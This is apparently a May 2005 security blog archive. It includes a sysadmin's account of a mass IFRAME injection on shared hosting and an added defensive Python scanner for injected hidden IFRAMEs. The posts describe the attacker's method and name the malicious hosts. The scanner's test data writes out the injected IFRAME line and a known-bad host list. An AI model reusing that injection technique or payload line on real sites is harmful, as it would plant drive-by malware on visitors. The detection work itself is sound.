General: May 2005 Archives
An article over at Silicon.com takes a look at that old concept of requiring a license to use the Internet.
Just as corporate and university networks have taken steps to implement access control to keep out infected systems, so too should ISPs look at banning machines that don't meet a defined security regime.
The article goes on to draw parallels to driver's licenses, restaurants known to serve food that makes you ill, and bad neighbors. If you can call the cops to do something about those, why can't you ban bad Internet neighbors?
In the U.S. the vast majority of Internet service providers are trying to make a buck. Why would they refuse service to these cyberslackers, who quickly become spam-bots because of their inability to patch? Banks do it all the time: they refuse to open accounts for people known to bounce checks, because a few bucks up front for the account isn't worth the trouble that will come down the pipe. Unfortunately this analogy has been largely lost on ISPs.
Many ISPs have pink-list contracts: contracts under which spammers pay a PREMIUM and may hang around until the anti-spammers complain too much. Historically many ISPs have not been good caretakers of their portion of the network. They are in it for the fast buck. They are more than willing to let Ma and Pa Kettle onto the Internet without a personal firewall, without adequate patching and without adequate antivirus. AOL and Earthlink run commercials saying they are different. They sell security to the user as usability, delivered by devices that block spam and spyware. But how many of AOL's customers actually have the AOL Security Edition?
I'm reading The Art of Deception by Kevin Mitnick. I would suspect that it will be the basis of more than a few blogs going into the future. I really don't like Mitnick but was convinced to pick up his book. From what I've read so far, he defends himself with the classic lines of 'I didn't intend to do any harm', 'I didn't know what I was doing was wrong', and 'I was just curious'.
Oh well. The discussion of the place of criminals as security experts is one for another day. I intended this post to be about preparation. Mitnick reports that he practiced and honed his trade. It reminded me of a Dateline episode I saw where gangs would get together and study war, psychology, law, etc. The bad guy is always seeking to perfect his craft. As sysadmins and security professionals we need to be seeking to perfect our craft also. The more we get caught up in the tyranny of the now, the less we develop our own skill set and our corporate defenses.
JD comments on Kaspersky Lab's forecast that global virus outbreaks are waning. My comments here are a reply to that.
I suspect that mass-mailing viruses will be seen in the leet community the way denial of service attacks are: a pedestrian form of attack, not worthy of anyone with skillz. Does that mean they will completely disappear? No. There will always be some dope willing to do it.
The big lesson here is don't get caught fighting last year's war. If you're all confident in your SMTP antivirus defenses, it may be time to reexamine them.
Will attacks targeted at specific companies further reduce the role of definition-based antivirus? Actually this is nothing new. I know of a company where the CEO is known to have received two different keystroke loggers by opening a .mdb file sent to him. That kind of targeted virus was tough for definition-based antivirus to stop then, and it will be a problem in the future unless more behavioral and heuristic tests are employed.
Ben Goodger, lead engineer for Mozilla Firefox, lobbed a grenade or two at Netscape 8's insecurity in his latest blog entry, from May 19th.
I've been wondering what the University of Fairfax is. Diploma mill or what? They've been sponsoring some CISSP study sessions locally and some CISSP webcasts that I watched. They offer a PhD in Information Systems concentrating in Information Assurance.
While the website did look like a real program rather than a diploma mill, I was suspicious, having not heard of them before. The next item that raised my suspicions was the statement "The University of Fairfax is certified by the State Council of Higher Education for Virginia to operate in the Commonwealth of Virginia." When I looked at that state website, it appeared to be more a registration of higher education programs than any endorsement or accreditation of the curriculum.
Next, a quick Google search led to an AP story posted at WTOP. Apparently the guy running this school is banned from heading schools in Maryland because a school he led shut down abruptly in the 90s, leaving students and the government in the lurch. Not only that, but two men listed as faculty on the University of Fairfax web site told reporters they never taught a course there!
I found a Washington Post article that goes into some detail.
Makes me worry now about (ISC)^2. They are currently engaging in joint marketing with the University of Fairfax. Basically they are lending their name and reputation to this guy. What do they say about it? Marc Thompson, VP at (ISC)^2, says Berlin's "heart is in the right place" in spite of his checkered past. That's right: taking millions to offer education courses and then folding up shop is just a mistake and shouldn't preclude you from offering more education courses in the future, according to (ISC)^2.
I can't conclude that this is a diploma mill, but it sure seems shady. Whether looking for training or returning to school, you need to verify the accreditation of the school and the credentials of its instructors.
Netscape 8.0 was replaced by 8.0.1 hours after its release, as several vulnerabilities were found. The vulnerabilities would reportedly allow an attacker to execute arbitrary code if the user went to the attacker's malicious site. What is really sad is that these appear to be known vulnerabilities in the Gecko engine that Firefox patched on May 6th.
Netscape requires an uninstall before a non-vulnerable version can be installed.
Two guys are walking in the woods and they come upon a big bear. The bear sees them as food and creeps toward them. The first guy starts to slowly tiptoe away, but the second guy takes off his hiking boots and pulls out his running shoes. The first guy says, "You can't outrun that bear!" The second guy says, "I don't have to outrun the bear, I just have to outrun you!"
This illustration is often used to show that you don't have to have perfect security. True, perfect security is an illusion. But what does it matter if my security is better than my neighbor's?
Let's think of two common types of attacks. One is the network worm. It doesn't care whose network it's on. It doesn't know whether my network is more secure or less secure than my neighbor's. If I am vulnerable to the threat, I am hosed.
In the other type of attack, I may be specifically targeted. Again, the attacker doesn't care about my relative security. He is specifically after me.
This isn't like home security, where a burglar will move on to the unattended home. Companies need to take steps to secure their network based on their business impact analysis. The only time being "faster than the bear" will help is when you are trying to prove due diligence.
Apparently I've got to start watching 24.
Back in April, 24 had hilariously bad dialogue involving Blowfish.
Now they have had a huge product placement for Cisco right in the middle of the show.
Chloe: How did this happen? Mr. Buchanan, the network security monitor lit up. Someone on the outside is trying to jam our satellite servers.
Buchanan: Could this just be high network load?
Chloe: No, it's definitely a denial of service attempt. What do you want me to do?
Buchanan: Did it do any damage yet?
Chloe: No, the Cisco system is self defending.
You can go see the clip on Cisco's site.
Personally I think product placements in shows are great when they aren't horribly out of place. I did have to laugh, though, at the use of Cisco's "self-defending network" marketing line. While the concept they espouse is interesting, they may get in trouble one day for a little thing called truth in advertising.
Rick Rescorla was the head of security for Morgan Stanley at the World Trade Center. His is one story that cannot be told often enough.
After the 1993 truck bombing at the WTC, he drilled the employees of Morgan Stanley in emergency evacuation procedures. Because of this preparedness and his call to evacuate on 9/11/01, everyone in Morgan Stanley made it out except for himself and two of his staff. Unfortunately, emergency evacuation procedures call for making sure everyone else gets out first. Rick died when the tower he was in collapsed while he performed his duties, doing a floor-by-floor search for stragglers.
I just found out that Amazon has a book on his life, Heart of a Soldier. I can't wait to get it.
Rather than do a further recap of Rick's life, here are some links. If you can keep a dry eye while reading them, you are much tougher than I am.
http://www.mudvillegazette.com/archives/000307.html
http://www.post44.org/misc/rescorla.html
http://www.newyorker.com/fact/content/?020211fa_FACT1

Do you subscribe to any security magazines? There are CSO, Information Security Magazine, and SC Magazine. There are probably others I haven't thought of.
All you need to do is provide some information. What is your security budget? What is your purchasing authority? What types of products do you plan to buy over the next 6 months? Give away some information and get a free magazine.
Kind of ironic that security magazines would rely on information disclosure as a core part of their business model. I can live with that, since the information is so generic. The problem is when they keep asking me to fill out the form to resubscribe after I've already done it. I just had a "Barbara" from SC Mag hang up on me when I told her I had already resubscribed twice and asked how many times I needed to resubscribe before they would stop asking me to do it.
Gene Kim, the CTO of Tripwire, did a study of hundreds of organizations in late 2002 and early 2003. He found that many organizations were struggling with patch management and had system administrator to server ratios of 1 administrator to 5 or 6 servers. Other organizations were humming along with ratios of one administrator to a hundred servers. The 1:100 organizations also had strong security. The difference he found between the organizations was the policy and controls in place.
The Tripwire website has an article that goes along with this. What is needed is a prevailing culture of change management, rigorous configuration management practices, and a heavy reliance on release management.
At work, there is an initiative to implement IT Service Management. Administrators have responded with reticence. There are fears that the sysadmin's job will be nothing more than updating knowledge base articles and disaster recovery plans. The feeling is that system administration is a dark art rather than a science. From the reports of Gene Kim, it sounds like there is a lot of improvement to be had if the process can be implemented correctly.
You wouldn't build a house and then add electricity after the fact. It would end up costing you much more, since you would need to rip out the walls to install the wiring. The inspections done by the local authorities need to take place as the building goes up, to ensure that the installation is safe.
The same is true for security in projects at work. Security is most effective when it is planned and implemented throughout the entire lifecycle.
I got back from a Mother's Day trip, and I see that tgp.la's registrar has given them the kibosh.
http://whois.dotregistrar.com/drs/wwwhois.pl?domain=tgp&tld=.LA&Check=Check
Status:PENDING DELETE RESTORABLE
Status:HOLD
Also, the glue records that were in place on the root servers are gone. I don't want to be premature here, but I think we've stopped the tgp.la hijack. :)
I suspect the hacker's next step will be to attempt to re-modify all the home pages on PowWeb. With tgp.la offline and unlikely to return, they'll need a new domain for a new attack.
tgp.la was offline last night. I assume that someone got to the bad guy's web host and had him termed for abuse. By this morning the site was online and pointing to a new IP address. These bad guys are experienced at playing whack-a-mole. If you take out one site, he's ready to pop up in a new location.
I contacted the new web host (still no word from them) as well as the bad guy's dynamic DNS provider, EveryDNS. EveryDNS responded before I returned from lunch. They have pulled the guy's DNS and redirected it to a "termed for abuse" web page. So I've got one confirmed kill thus far. :)
The problem is that doesn't slow him down much. The guy just goes to his registrar and changes the authoritative DNS servers. So I've contacted the guy's registrar to see if we can terminate the domain itself for abuse. That will prevent any further exploitation of these sites through the iframe pointing to tgp.la. Of course, the bad guy will then register a new domain, but he will have to start from scratch. Since no one has figured out how this was done in the first place, we'll probably find all the sites infected again with the new URL.
This is part 2; it may make more sense if you start with part one, posted earlier.
Chris Mosby is a fellow moderator over at myitforum.com, and his blog (which I joke is a mirror of the SANS ISC) has provided a clue as to what is going on. Not being familiar with Apache, I wasn't sure exactly how an attacker would compromise all the websites on a server and add a footer to each. Chris has posted a SANS Internet Storm Center report from March showing that an attacker who has compromised the server just needs to look in httpd.conf to get a list of the virtual hosts and their document roots. Then it is just a matter of appending exploit code to the pages of each of those virtual sites.
What's funny is that although I read Chris's blog daily and read the SANS blog daily, I didn't remember this. A fellow user at PowWeb did a search and found his article.
Next I went to MSN Search to find sites that link to www.tgp.la/or.html. Google would not find any results for me. I guess they don't include links inside an iframe tag. MSN Search found over 1000 compromised sites, all at PowWeb. It really starts to look like my provider got compromised, not me.
Hopefully people reading this now understand that you don't get infected only by surfing to the seamy underbelly of the web. Not anymore. It's the sites you go to every day. So you need to stay vigilant. Stay patched. Stay up to date on your antivirus.
The fun continues over at PowWeb. A bunch of us have noticed that our home pages have been appended (at the bottom) with an IFRAME calling http://www.tgp.la/or.html. The file change occurred at 2005-05-03 21:34 (-0700).
The tgp.la page is loaded as a web bug (0 by 0 in size) on my home page. When I examine what www.tgp.la/or.html does, I see that it loads, via another iframe, http://www.realizeit.biz/v058/wow.html. That HTML page uses an old Internet Explorer exploit to install some spyware known as Trojan.Desktophijack. Some antivirus already catches it. Symantec wasn't catching it, so I submitted the file to Symantec. They responded that it is a virus and they will be adding it to the definitions. Hopefully it makes it into the LiveUpdate due out today.
The question in incident handling is how it happened. With the 404 redirect problem at PowWeb that I reported before, it was fairly easy to prove that it was a PowWeb problem (although they never admitted it). In this case it is much more difficult to prove. The PowWeb fanboys are pointing a finger at the applications we are using (PHP-Nuke, Movable Type, Gallery, phpBB, AWStats, etc.). Then there is also the potential for the FTP password being guessed.
There is not one vulnerable package that we all run. I suppose it could be a hybrid worm looking for several vulnerabilities, but I think I would see something like that in my HTTP logs. I've reviewed the logs and see nothing of the sort. That leaves me wondering if my web provider PowWeb hasn't screwed up again like they did with the 404 error page problem. Until we figure out what is wrong, there is no way to guarantee that an attacker will not be able to update my page again!
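The ISC report in part 2 describes the attacker's recipe (read httpd.conf for the list of virtual hosts, then append an IFRAME to each site's pages), and part 1 describes what the injected IFRAME looked like (0 by 0, pointing at www.tgp.la/or.html). The same recipe works in reverse for a server admin who wants to find every site that was hit. The scanner below is an added example, not code from these posts or from PowWeb: it parses the <VirtualHost> blocks for ServerName and DocumentRoot, walks each document root, and flags IFRAMEs that are zero-sized, hidden by style, or point at the two hosts named in the posts. The httpd.conf text and the two sample document roots it builds in a temporary directory are constructed test data.

```python
"""Scan every Apache vhost's DocumentRoot for injected hidden IFRAMEs.
Added example (not the original post's or PowWeb's code): the ISC report's
attacker recipe, read httpd.conf for the vhost list and visit each
DocumentRoot, applied defensively. Config text and pages below are constructed."""
import os
import re
import tempfile
from html.parser import HTMLParser

# Hosts the posts name in the payload chain; extend this with your own indicators.
KNOWN_BAD_HOSTS = {"www.tgp.la", "www.realizeit.biz"}

VHOST_RE = re.compile(r"<VirtualHost\b[^>]*>(.*?)</VirtualHost>", re.S | re.I)
DIRECTIVE_RE = re.compile(r'^\s*(ServerName|DocumentRoot)\s+"?([^"\s]+)', re.M | re.I)


def parse_vhosts(conf_text):
    """Return [(server_name, document_root), ...] for each <VirtualHost> block."""
    vhosts = []
    for block in VHOST_RE.findall(conf_text):
        fields = {k.lower(): v for k, v in DIRECTIVE_RE.findall(block)}
        if "documentroot" in fields:
            vhosts.append((fields.get("servername", "?"), fields["documentroot"]))
    return vhosts


class IframeFinder(HTMLParser):
    """Collect IFRAME tags that look like web bugs or point at known-bad hosts."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":  # HTMLParser already lower-cases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "")
        host = re.sub(r"^https?://", "", src, flags=re.I).split("/")[0].lower()
        reasons = []
        if host in KNOWN_BAD_HOSTS:
            reasons.append("known-bad host")
        size = (a.get("width", "").strip(), a.get("height", "").strip())
        if size[0] in ("0", "0px") and size[1] in ("0", "0px"):
            reasons.append("0x0 frame")
        if "display:none" in a.get("style", "").replace(" ", "").lower():
            reasons.append("hidden by style")
        if reasons:
            self.hits.append({"src": src, "reasons": reasons})


def find_suspicious_iframes(html):
    """Return the suspicious IFRAMEs found in one HTML document."""
    finder = IframeFinder()
    finder.feed(html)
    return finder.hits


def scan_docroots(vhosts, exts=(".html", ".htm", ".php")):
    """Walk each DocumentRoot; return {server_name: [(path, hit), ...]}."""
    findings = {}
    for name, root in vhosts:
        for dirpath, _, files in os.walk(root):
            for fn in files:
                if not fn.lower().endswith(exts):
                    continue
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for hit in find_suspicious_iframes(fh.read()):
                        findings.setdefault(name, []).append((path, hit))
    return findings


def build_sample_site():
    """Constructed test data: two vhosts on disk, one clean and one carrying the
    appended IFRAME from the incident. Returns the matching httpd.conf text."""
    base = tempfile.mkdtemp(prefix="vhosts-")
    pages = {
        "clean.example": "<html><body>Hello</body></html>\n",
        "victim.example": "<html><body>Hello</body></html>\n"
        '<iframe src="http://www.tgp.la/or.html" width="0" height="0"></iframe>\n',
    }
    conf = ""
    for name, body in pages.items():
        root = os.path.join(base, name)
        os.makedirs(root)
        with open(os.path.join(root, "index.html"), "w", encoding="utf-8") as fh:
            fh.write(body)
        conf += f'<VirtualHost *:80>\n  ServerName {name}\n  DocumentRoot "{root}"\n</VirtualHost>\n'
    return conf


if __name__ == "__main__":
    for name, hits in scan_docroots(parse_vhosts(build_sample_site())).items():
        for path, hit in hits:
            print(f"{name}: {path}: {hit['src']} ({', '.join(hit['reasons'])})")
```

On a real server you would feed parse_vhosts the actual httpd.conf (and any Include files) and run it from the account that can read every DocumentRoot. Note what this does and does not answer: it tells you which sites carry the footer, and the file mtimes of the hits give you the injection window like the one noted above, but it says nothing about how the attacker got write access in the first place, which is still the open question in this incident.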
VNUnet.com interviewed Nick Ray, chief executive of Prevx, a company providing HIPS (host intrusion prevention) software.
As you might expect from a HIPS vendor, he argues that patching cannot occur quickly enough to provide protection, and that antivirus is outmatched because it relies on an outdated, reaction-oriented update model.
"Hips in theory should require no patches, no signature updates and no rules to work because it identifies the characteristics of the attack behavior and stops the action taking place."
"A security guard trained to recognize the faces of wanted criminals is of no use if he fails to spot a masked man breaking in."
Another week, another story about lost backup tapes.
The Washington Post reports that a Time Warner backup tape containing information on 600,000 current and former employees was lost during transport by their data storage company, Iron Mountain.
I'm sure that most of these stories about missing tapes are the result of poor procedures and record keeping and that the tapes aren't in the hands of a data thief. I just don't think it's a good idea to take that risk anymore. Backup administrators should demand that their backup software include encryption with appropriate key management, with the keys kept apart from the tapes, so that a tape that goes missing is unreadable to whoever finds it.
SecurityFocus has an article on the danger of backup tapes, which has been a hot-button issue for me over the past few months.
The author points out that you take the lowest paid guy in the IT department (commonly known as a tape jockey) and place a backup tape with the entirety of the corporate data in his hands. If your company name is AOL, Ameritrade, or Bank of America, you know what kind of trouble that can cause.